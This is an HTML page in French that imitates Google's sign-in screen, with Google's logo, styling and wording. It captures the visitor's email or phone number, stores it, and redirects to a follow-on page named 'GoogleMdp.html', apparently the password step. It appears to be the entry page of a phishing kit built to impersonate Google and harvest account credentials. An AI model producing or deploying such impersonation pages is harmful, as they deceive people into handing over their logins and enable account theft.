<!DOCTYPE html>
<html lang="fr">
<head>
  <meta charset="UTF-8">
  <title>Connexion - Google</title>
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">

  <style>
    a {
      color: #a8c7fa;
      text-decoration: none;
    }

    body {
      margin: 0;
      background-color: #1e1f20;
      font-family: Arial, sans-serif;
      height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
    }

    .container {
      background-color: #0e0e0e;
      color: white;
      width: 1100px;
      height: 400px;
      border-radius: 30px;
      padding: 30px 40px;
      box-sizing: border-box;
      position: relative;
      display: flex;
    }

    .logo {
      position: absolute;
      top: 30px;
      left: 30px;
    }

    .logo img {
      height: 50px;
    }

    .left {
      flex: 1;
      display: flex;
      flex-direction: column;
      justify-content: center;
      padding-left: 20px;
      padding-bottom: 100px;
    }

    .left h1 {
      font-size: 40px;
      font-weight: normal;
      margin-bottom: 10px;
    }

    .left p {
      font-size: 15px;
      color: #ccc;
    }

    .right {
      flex: 1;
      display: flex;
      flex-direction: column;
      justify-content: center;
      padding-right: 20px;
    }

    .input-box {
      position: relative;
      width: 100%;
    }

    .input-box input {
      width: 100%;
      padding: 14px 10px;
      font-size: 16px;
      border: 2px solid #a8c7fa;
      border-radius: 5px;
      outline: none;
      background-color: #0e0e0e;
      color: white;
    }

    .input-box label {
      position: absolute;
      top: 14px;
      left: 12px;
      color: #aaa;
      font-size: 16px;
      pointer-events: none;
      transition: all 0.2s ease;
    }

    .input-box input:focus + label,
    .input-box input:not(:placeholder-shown) + label {
      top: -10px;
      left: 10px;
      font-size: 12px;
      color: #a8c7fa;
      background-color: #0e0e0e;
      padding: 0 4px;
    }

    .input-error {
      border: 2px solid #f2b8b5 !important;
    }

    .label-error {
      color: #f2b8b5 !important;
    }

    #errorMessage {
      color: #f2b8b5;
      font-size: 13px;
      margin-top: 6px;
      display: none;
    }

    .info-text {
      margin-top: 30px;
      color: #c4c7c5;
      font-size: 14px;
      padding-left: 2px;
    }

    .suivant-btn {
      position: absolute;
      bottom: 20px;
      right: 40px;
      background-color: #b6d0fb;
      color: rgb(0, 0, 0);
      border: none;
      border-radius: 25px;
      padding: 10px 30px;
      font-size: 16px;
      cursor: pointer;
    }

    .suivant-btn:hover {
      background-color: #b6d0fb;
    }
  </style>

<script>
  document.addEventListener("DOMContentLoaded", function () {
    const bouton = document.querySelector(".suivant-btn");
    const input = document.getElementById("emailInput");
    const label = document.querySelector("label[for='emailInput']");
    const errorMessage = document.getElementById("errorMessage");

    function isValidEmailOrPhone(value) {
      const emailRegex = /^[a-zA-Z0-9._%+-]+@(?:gmail\.com|hotmail\.fr|yahoo\.(?:fr|com)|outlook\.(?:com|fr)|protonmail\.com|free\.fr|orange\.fr)$/i;
      const phoneRegex = /^(\+33|0)[1-9](\d{2}){4}$/;
      return emailRegex.test(value) || phoneRegex.test(value);
    }

    bouton.addEventListener("click", function () {
      const valeur = input.value.trim();

      if (valeur === "") {
        input.classList.add("input-error");
        label.classList.add("label-error");
        errorMessage.style.display = "block";
        errorMessage.textContent = "Saisissez une adresse e-mail ou un numéro de téléphone";
      } else if (!isValidEmailOrPhone(valeur)) {
        input.classList.add("input-error");
        label.classList.add("label-error");
        errorMessage.style.display = "block";
        errorMessage.textContent = "Entrez une adresse e-mail valide (ex: nom@gmail.com) ou un numéro de téléphone.";
      } else {
        localStorage.setItem("email", valeur);
        window.location.href = "GoogleMdp.html";
      }
    });

    input.addEventListener("input", function () {
      input.classList.remove("input-error");
      label.classList.remove("label-error");
      errorMessage.style.display = "none";
    });
  });
</script>
</head>
<body>
  <div class="container">
    <div class="logo">
      <img src="https://www.gstatic.com/images/branding/product/1x/googleg_32dp.png" alt="Logo">
    </div>

    <div class="left">
      <h1>Connexion</h1>
      <p>avec votre compte Google. Ce compte sera disponible pour d'autres applis Google dans le navigateur.</p>
    </div>

    <div class="right">
      <div class="input-box">
        <input type="text" id="emailInput" required placeholder=" ">
        <label for="emailInput">Adresse e-mail ou téléphone</label>
        <small id="errorMessage">Saisissez une adresse e-mail ou un numéro de téléphone</small>
      </div>
      <div class="info-text">
        Ce n'est pas votre ordinateur ? Utilisez le mode Invité pour vous connecter en mode privé.
        <a href="https://support.google.com/chrome/answer/6130773?hl=fr" target="_blank">En savoir plus sur l'utilisation du mode Invité</a>
      </div>
    </div>

    <button class="suivant-btn">Suivant</button>
  </div>
</body>
</html>
